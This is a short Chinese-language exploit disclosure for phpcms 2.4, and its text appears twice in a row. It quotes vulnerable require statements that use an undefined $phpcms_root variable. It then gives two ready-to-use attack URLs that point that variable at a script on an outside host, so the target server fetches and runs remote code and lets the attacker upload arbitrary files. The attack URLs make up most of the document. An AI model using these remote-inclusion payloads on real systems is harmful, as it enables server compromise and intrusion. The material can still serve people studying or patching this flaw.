版本:phpcms 2.4
Bug find by cooldiyer @ 2006/12/6 @ 19:32
漏洞文件:guestbook.php、editor\admin\default.php、.......N多都有漏洞
guestbook.php漏洞代码如下
[Copy to clipboard]CODE:
require ’common.php’;
require $phpcms_root.’/include/ubb.php’;
editor\admin\default.php漏洞代码如下:
[Copy to clipboard]CODE:
require ’../../common.php’;
require $phpcms_root.’/admin/global.php’;
漏洞利用演示:
http://localhost/phpcms/guestbook.php?phpcms_root=http://xdiyer.uni.cc/tools/tools/x.txt?
http://localhost/phpcms/editor/admin/default.php?phpcms_root=http://xdiyer.uni.cc/tools/tools/x.txt?
可以上传任意文件到服务器上
总结:不要因为common.php用Zend加密了就以为phpcms_root这个变量已经定义了,事实不是这样 -
Bug find by cooldiyer @ 2006/12/6 @ 19:32
漏洞文件:guestbook.php、editor\admin\default.php、.......N多都有漏洞
guestbook.php漏洞代码如下
[Copy to clipboard]CODE:
require ’common.php’;
require $phpcms_root.’/include/ubb.php’;
editor\admin\default.php漏洞代码如下:
[Copy to clipboard]CODE:
require ’../../common.php’;
require $phpcms_root.’/admin/global.php’;
漏洞利用演示:
http://localhost/phpcms/guestbook.php?phpcms_root=http://xdiyer.uni.cc/tools/tools/x.txt?
http://localhost/phpcms/editor/admin/default.php?phpcms_root=http://xdiyer.uni.cc/tools/tools/x.txt?
可以上传任意文件到服务器上
总结:不要因为common.php用Zend加密了就以为phpcms_root这个变量已经定义了,事实不是这样 -